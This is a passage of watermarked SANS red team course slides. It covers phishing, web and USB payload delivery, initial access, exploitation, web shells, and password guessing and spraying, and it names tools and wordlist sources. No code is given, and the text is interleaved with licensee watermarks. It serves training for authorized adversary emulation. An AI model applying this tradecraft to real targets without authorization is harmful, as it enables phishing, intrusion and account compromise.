SEC564 | Red Team Exercises and Adversary Emulation

143

ak

er

@ ya

ho

22829180 i< an

nm

Delivery: Email With the payload packaged, it is time to deliver it and obtain initial access. Email delivery is a common method, whether sending a phishing email with a link or an attachment.

Lincoln Mazzei nc o

ln

M

az

ze

Self-Setup: Set up your server to send the phishing emails. Many options for sending email such as Sendmail and Postfix. Every self-setup SMTP server should be configured with DKIM, SPF, and PTR records; this will assist in obtaining reputation. Plan around 30 days to gain reputation and be able to send email from your server to the target. • DomainKeys Identified Mail (DKIM) is an email authentication method designed to detect forged sender addresses in emails (email spoofing), a technique used in phishing and spam. DKIM allows the receiver to check that an email claiming to come from a specific domain was indeed authorized by the domain owner. • Sender Policy Framework (SPF) is an email authentication method designed to detect forged sender addresses in emails. SPF allows the receiver to check that an email claiming to come from a specific domain comes from an IP address authorized by that domain's administrators. The list of authorized sending hosts and IP addresses for a domain is published in the DNS records for that domain. • Pointer DNS record: Pointer to a canonical name. Unlike a CNAME, DNS processing stops and just the name is returned. The most common use is for implementing reverse DNS lookups, but other uses include such things as DNS-SD.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Third Party: Using a third-party service (e.g. Gmail, Outlook/Live, Yahoo) gains reputation but may violate the Terms of Service. Third-party email services often implement controls to prevent spam. Test sending the payload.

live

Open Relay: Adversaries often use open mail relays and is not advisable for adversary emulations from the internet. Once on the internal network, an open relay can be leveraged for phishing emails to look very realistic. References: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/ https://attack.mitre.org/techniques/T1193/ https://en.wikipedia.org/wiki/DomainKeys_Identified_Mail https://en.wikipedia.org/wiki/Sender_Policy_Framework https://en.wikipedia.org/wiki/List_of_DNS_record_types#PTR https://redcanary.com/blog/top-techniques-spearphishing-attachment-t1193/ © 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

143

© SANS Institute 2020 ATT&CK T1192

Delivery: Web

TM

090aff33bcb6e401ded410120bc9a268 Host your payload on a web server 26 ,2 02 0

• Set up web server (domain, TLS, categorization) • Social engineer target to visit Red Team web server, download, and execute payload • URL shortener

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

144

ak

er

@ ya

ho

22829180 i< an

nm

Delivery: Web To avoid email security controls, Red Team can host a web server with the payload for the target to download and execute. Hosting the web server should follow the same operational security guidelines covered in the attack infrastructure section:

ze

Lincoln Mazzei M

az

Purchase a domain and TLS certificate Consider hosting in cloud environment Obtain reputation and categorization of the domain

ln

• • •

nc o

With the payload hosted, socially engineer the target to download and execute the payload. Outbound HTTP is generally allowed outbound in most organizations. URL Shorteners will help as the entire URL may be suspicious.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://attack.mitre.org/techniques/T1189/ https://attack.mitre.org/techniques/T1192/ https://bitly.com/

live

144

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1091

Delivery: USB

TM

090aff33bcb6e401ded410120bc9a268 Place payload in USB and have target plug it in 26 ,2 02 0

• USB storage read-access may be enabled in the target system • Rubber Ducky is a USB storage that emulates a keyboard • BadUSB or LANTurtle • USBHarpoon – malicious cable

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

145

ak

er

@ ya

ho

22829180 i< an

nm

Delivery: USB This delivery method requires the target to physically obtain and plug in a USB. Many end users may not be aware of the dangers of USB. It is very common for USB devices to be given away for free at conferences and other events. USB Storage devices may be allowed in the target environment. Placing the payload in the USB storage device is an option.

az

ze

Lincoln Mazzei nc o

ln

M

Another option is to use a Rubber Ducky. This is a device that looks like a USB Storage device but emulates a keyboard. Some organizations block USB storage entirely for both read and write access, but they cannot block USB devices as keyboards, mice, cameras, and other devices are required. The similar idea is leveraged by “BadUSB” is to “weaponize” USB devices by flashing their firmware and making them look like another type of USB devices (e.g. a network card that changes DNS settings and reroutes traffic).

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

Lastly, while the initial BadUSB is focused on weaponizing USB sticks, “USBHarpoon” has managed to also weaponize USB cables. The objective of USBHarpoon was to make the attack even more effective, as end-users might suspect USB sticks, but not USB cables.

Li

References: https://attack.mitre.org/techniques/T1091/ https://shop.hak5.org/products/usb-rubber-ducky-deluxe

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

145

© SANS Institute 2020 Course Roadmap

Lab 1.4: C2 and Weaponization

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

146

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

146

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Click1.4 To| Edit Master Title Style Lab C2 and Weaponization

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 1.4 | C2 and Weaponization

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

147

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

147

© SANS Institute 2020 Conclusion for 564.1

Frameworks and Methodologies Threat Intelligence Planning Attack Infrastructure Reconnaissance and Social Engineering C2 and Weaponization

Closure

Threat Intelligence

Ap ril

[email protected] Planning

m

>

Testing

o.

co

• • • • • •

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 A range of Red Team concepts were explored

SEC564 | Red Team Exercises and Adversary Emulation

148

ak

er

@ ya

ho

22829180 i< an

nm

Conclusion for 564.1 That concludes Day 1 of Red Team Exercises and Adversary Emulations. We began by introducing you to Red Team exercises and adversary emulations to show how they differ from other security testing types such as vulnerability assessments, penetration tests, and purple teaming. We covered a number of industry frameworks (including the Cyber Kill Chain, Unified Kill Chain, and ATT&CK, among others) for Red Team exercises and adversary emulations. Threat Intelligence is a main factor and trigger to performing Red Team exercises. A successful Red Teamer needs to know how to obtain and consume threat intelligence to successfully plan and execute an adversary emulation. We covered planning, learned what triggers an exercise, and how to define objectives and scope and set up attack infrastructure. We covered roles and responsibilities, including those of the trusted agents (White Team or Cell), and about establishing the rules of engagement. With a strong plan, an exercise execution phase can begin. We covered Red Team Planning and weaponization. The day concluded with a hands-on lab emulating a chosen adversary against our own test environment before attempting initial access to the target environment.

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Tomorrow, we will cover Red Team Exercise Execution following the Unified Kill Chain with mapping to ATT&CK framework. We will cover exercise closure, including reporting, lessons learned, remediation planning, etc.

live

148

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

SEC564 | RED TEAM EXERCISES AND ADVERSARY EMULATION

090aff33bcb6e401ded410120bc9a268

564.2

26 ,2 02 0

Red Team Exercise [email protected] o.

co

m

>

Ap ril

Execution and Closure i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

Copyright © 2020 Jorge Orchilles. All rights reserved to Jorge Orchilles and/or SANS Institute.

PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT ("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware subject to the terms of this agreement. Courseware includes all printed materials, including course books and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this CLA supersedes any oral or written proposal, agreement or other communication relating to the subject matter of this CLA.

[email protected] o.

co

m

>

Ap ril

BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF. If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.

ho

22829180 nm

ak

er

@ ya

User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent, lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written consent of SANS Institute.

i< an

If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or addendum to this CLA may accompany this Courseware.

az

ze

Lincoln Mazzei nc o

ln

M

SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs presented in this Courseware are the sole property of their respective trademark/registered/copyright owners, including: AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac, iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch, iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro, Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight, There’s an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are registered trademarks of Apple Inc.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK PMP and PMBOK are registered marks of PMI.

live

SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission. SIFT® is a registered trademark of Harbingers, LLC. Used with permission. Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.

SEC564_2_F01_01

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 SEC564.2

Red Team Exercises and Adversary Emulation

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Red Team Exercise Execution and Closure co

m

>

Ap ril

[email protected] o.

© 2020 Jorge Orchilles | All Rights Reserved | Version F01_01

ak

er

@ ya

ho

22829180 i< an

nm

Hello and welcome to SANS Security 564 Red Team Exercises and Adversary Emulation. We are discussing how to run successful Red Team Exercises and Adversary Emulations to bring the most value to the target organization while introducing the least amount of risk.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

1

© SANS Institute 2020 Table of Contents

Page

090aff33bcb6e401ded410120bc9a268 4

Initial Access

13

Network Propagation

15

26 ,2 02 0

Lab 2.1: Delivery and Initial Access

Discovery

[email protected]

Persistence

Ap ril

Privilege Escalation

m

>

Lab 2.2: Discovery, Privilege Escalation, and Persistence

o.

co

Defense Evasion and Execution Credential Access

SEC564 | Red Team Exercises and Adversary Emulation

37 49 56 58 74 2

ak

er

@ ya

ho

22829180

17

i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

2

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Table of Contents

Page

090aff33bcb6e401ded410120bc9a268 Lateral Movement and Pivoting

90

Lab 2.3: Defense Evasion, Credential Access, and Pivoting

98

100

26 ,2 02 0

Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives

[email protected] Ap ril

Exercise Closure

Analysis and Response

co

m

>

Reporting

o.

Remediation and Action Plan Lab 2.5: Exercise Closure

108 110 113 120 126 135

SEC564 | Red Team Exercises and Adversary Emulation

3

ak

er

@ ya

ho

22829180

102

i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

3

© SANS Institute 2020 Course Roadmap

Initial Access

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

4

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

4

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1203

Initial Access

TM

090aff33bcb6e401ded410120bc9a268 Tactic of gaining the initial foothold into the target environment 26 ,2 02 0

• May include exploitation – Drive-by Compromise – Exploit Public-Facing Application – External Remove Services

[email protected] o.

co

m

>

Ap ril

• Hardware additions or Replication through Removable Media • Phishing with attachment or links • Trusted Relationship, Supply Chain, or Valid Accounts

SEC564 | Red Team Exercises and Adversary Emulation

5

ak

er

@ ya

ho

22829180 i< an

nm

Initial Access The initial access tactic represents the techniques and procedures adversaries may use to gain an initial foothold within a network. Obtaining initial access may be accomplished via various methods broken down into these categories:

ze

Lincoln Mazzei



M

ln



Drive-by Compromise: Exploiting a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. Exploit Public-Facing Application: Identifying a vulnerable internet-facing web application and exploiting it for code execution. External Remote Services: Exploiting vulnerabilities or finding valid accounts for remote services such as VPNs, Citrix, and other access mechanisms, allow users to connect to internal enterprise network resources from external locations.

nc o



az

Exploitation:



ce

Hardware Additions: Computer accessories, computers, or networking hardware may be introduced into a system as a vector to gain execution. Replication through Removable Media: Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.

Li



ns

Hardware

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Phishing • • •

Spear phishing Attachment: Variant of spear phishing, which employs the use of malware attached to an email. Spear phishing Link: Variant of spear phishing, which employs the use of links to download malware contained in an email. Spear phishing via Service: Variant of spear phishing, which employs the use of third-party services rather than directly via enterprise email channels. © 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

5

© SANS Institute 2020 Supply Chain Compromise: Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Trusted Relationship: Adversaries may breach or otherwise leverage organizations that have access to intended victims.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Valid Accounts: Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. Reference: https://attack.mitre.org/tactics/TA0001/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

6

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1133

Exploitation

TM

090aff33bcb6e401ded410120bc9a268 In Adversary Emulations, exploits are only a means to an end 26 ,2 02 0

• Code or technique that a threat uses to take advantage of a vulnerability – Service-side exploit – Client-side exploit – Local privilege escalation

Ap ril

[email protected] m

>

• Risky

o.

co

– Service crash – System crash

SEC564 | Red Team Exercises and Adversary Emulation

7

ak

er

@ ya

ho

22829180 i< an

nm

Exploitation Exploitation is defined as code or technique that a threat uses to take advantage of a vulnerability. Exploits can be noisy, can be patched, and can be risky. In Adversary Emulations, exploits are only a means to an end. It may be required to obtain initial access or used in the network propagation step to move laterally. Exploits are generally defined under three categories: Service-side exploit: Attack a service that is listening on the network. The service gathers packets from the network, passively waiting for a user on a client machine to initiate a connection. To exploit the service, the attacker generates exploit packets destined for the target service. No user interaction on the target machine is required. Client-side exploit: Focus on attacking a client application that fetches content from a server machine. Based on user interaction, the client program must actively pull content from a machine configured to exploit it for this kind of attack to work. Local privilege escalation: Deal with an attacker who already has limited privileges to run code on a target machine. With this attack, the Red Teamer exploits some functionality of the target system to jump to higher privileges on the machine, such as root, admin, or SYSTEM privileges. Local privilege escalation attacks may or may not involve user interaction.



nc o

ln

M



az

ze

Lincoln Mazzei

ce

ns

ed



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Risky Exploitation could cause a target service to crash, resulting in a denial-of-service condition. On a critical production system, such service interruption could result in significant damages from financial, reputational, and other perspectives. Beyond the crash of an individual service, the entire target system could crash, causing several services to come offline. Or instead of bringing a system down immediately, an exploit could make it unstable. Thus, the service or system continues to run but has problems intermittently that might be difficult or impossible to track back to the exploitation attempt.

live

References: https://attack.mitre.org/techniques/T1133/ https://www.recordedfuture.com/top-vulnerabilities-2018/ https://www.zdnet.com/article/kaspersky-70-percent-of-attacks-now-target-office-vulnerabilities/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

7

© SANS Institute 2020 ATT&CK T1190

Exploitation: Web Application

TM

090aff33bcb6e401ded410120bc9a268 Most organizations have internet-accessible Web Applications 26 ,2 02 0

• Gaining access to the target organization through a web application vulnerability • Most exploitable vulnerabilities will be found through standard Web Application Penetration Testing • OWASP Top 10

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

8

ak

er

@ ya

ho

22829180 i< an

nm

Exploitation: Web Application Most organizations have an Internet Web Application exposed to the internet. While the industry has done a great job firewalling internal hosts from the internet, a web application requires at least one service to be open and accessible from the internet. Finding internet-accessible Web Applications with exploitable vulnerabilities is generally covered through standard Web Application Penetration Testing. SANS has two six-day courses on Web Application Penetration Testing. A great resource to those new to web application security can visit OWASP, the Open Web Application Security Project. They have a number of projects and resources for web application security, including the OWASP Top 10.

ln

M

az

ze

Lincoln Mazzei nc o

From OWASP Top 10 site: The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

References: https://attack.mitre.org/techniques/T1190/ https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

live

SANS Courses: SEC542: Web App Penetration Testing and Ethical Hacking: https://www.sans.org/course/web-app-penetration-testing-ethical-hacking SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques: https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking

8

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1100

Web Shells

TM

• A web script that allows a Red 090aff33bcb6e401ded410120bc9a268 Team to run commands on

26 ,2 02 0

the compromised target web server • Leverages language used by app

[email protected] Pivot into the network Ap ril

– PHP; ASP; JSP

o.

co

m

>

• • Can be placed by abused upload functionality or successful exploit of other web application vulnerabilities

SEC564 | Red Team Exercises and Adversary Emulation

9

ak

er

@ ya

ho

22829180 i< an

nm

Web Shells A web shell allows a Red Team to run commands on the target web server. It can serve as a pivot into the network. Web shells can provide a simple interface that allows to run single commands or consist of an advanced GUI with multiple types of functionality, such as direct file access, database connections, or network reconnaissance to explore the internal network as shown on the slide.

az

ze

Lincoln Mazzei nc o

ln

M

For a Red Team to be able to abuse a web shell on a web server, the web shell first has to be uploaded. This could either be done through a legitimate upload function provided by the web server or might be possible due to a vulnerability present in the web application. Once the Red Team has been able to upload the web shell, it has to be served back. If the file is accessible, but not interpreted as web script, and thus shown back as simple text, the Red Team will not be able to execute commands. The web server has to interpret the web shell’s script, meaning it needs to leverage the same technology on the web server such as PHP, ASP, or JSP. There are many examples of web shells for all these languages to use as examples.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://attack.mitre.org/techniques/T1100/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

9

© SANS Institute 2020 ATT&CK T1078

Password Guessing

TM

090aff33bcb6e401ded410120bc9a268 Actively send a username and password to attempt to login 26 ,2 02 0

May generate a lot of network traffic and logs May lock out accounts: DoS possibility Slower than password cracking Users manually sync passwords or make small changes Build custom dictionary or wordlist for target environment Many tools:

>

Ap ril

[email protected] m

• • • • • •

o.

co

– Hydra – Metasploit Auxiliary modules

SEC564 | Red Team Exercises and Adversary Emulation

10

ak

er

@ ya

ho

22829180 i< an

nm

Password Guessing Password guessing entails actively sending a username and password guess to attempt to authenticate to a remote system. This is generally slow and very noisy as each login attempt will most likely create a log. There is the possibility of locking out an account due to password and account lockout policies. This technique should only be used if other initial access attempts fail.

az

ze

Lincoln Mazzei ln

M

The best practice for password guessing is to obtain a targeted wordlist or dictionary that may work against the target account. There are many links in the references (on the next page) to assist in the creation of a dictionary.

nc o

Many tools exist for guessing passwords. Hydra is a free tool that works on Linux, Mac, and Windows. It is easy to use and currently supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTPPROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTPProxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Metasploit also has a number of auxiliary modules for login to various protocols. Both Hydra and Metasploit require a list of users and a list of passwords to guess.

live

10

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Wordlists and Language Dictionaries https://hashes.org/hashlists.php https://apasscracker.com/dictionaries/ https://www.openwall.com/passwords/wordlists/ ftp://ftp.cerias.purdue.edu/pub/dict/ ftp://ftp.funet.fi/pub/unix/security/dictionaries/ http://ftp.icm.edu.pl/packages/wordlists/

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Wordlist enhancers and generators https://github.com/hashcat/princeprocessor https://github.com/crunchsec/crunch https://github.com/digininja/CeWL https://github.com/digininja/RSMangler

Ap ril

[email protected] o.

co

m

>

References: https://attack.mitre.org/techniques/T1078/ https://github.com/vanhauser-thc/thc-hydra

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

11

© SANS Institute 2020 Password Spraying

090aff33bcb6e401ded410120bc9a268 Guess a common password for each known user account 26 ,2 02 0

• Instead of guessing many passwords for one user • Guess one password for many users (obtained during recon)

[email protected] >

Ap ril

– Fall2019! – 1

o.

co

m

• Spraying Toolkit by byt3bl33d3r • Burp or any HTTP Proxy

SEC564 | Red Team Exercises and Adversary Emulation

12

ak

er

@ ya

ho

22829180 i< an

nm

Password Spraying Password spraying is a technique of guessing one password against a large number of users. For example, Fall2019, Winter2019, 1, 2, etc. This requires obtaining a large list of possible user accounts during the recon phase.

ze

Lincoln Mazzei M

az

Spraying Toolkit by byt3bl33d3r from Black Hills Information Security is a set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful, and more efficient.

nc o

ln

Burp or any HTTP proxy can submit a list of users and passwords in an automated fashion against web applications. References: https://github.com/byt3bl33d3r/SprayingToolkit https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

12

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Lab 2.1 Delivery and Initial Access

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

13

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

13

© SANS Institute 2020 Click2.1 To| Edit Master Title Style Lab Delivery and Initial Access

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 2.1 | Delivery and Initial Access

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

14

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

14

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Network Propagation

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

15

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

15

© SANS Institute 2020 Network Propagation

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 With Initial Foothold established, post-exploitation (fun) begins!!

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

16

ak

er

@ ya

ho

22829180 i< an

nm

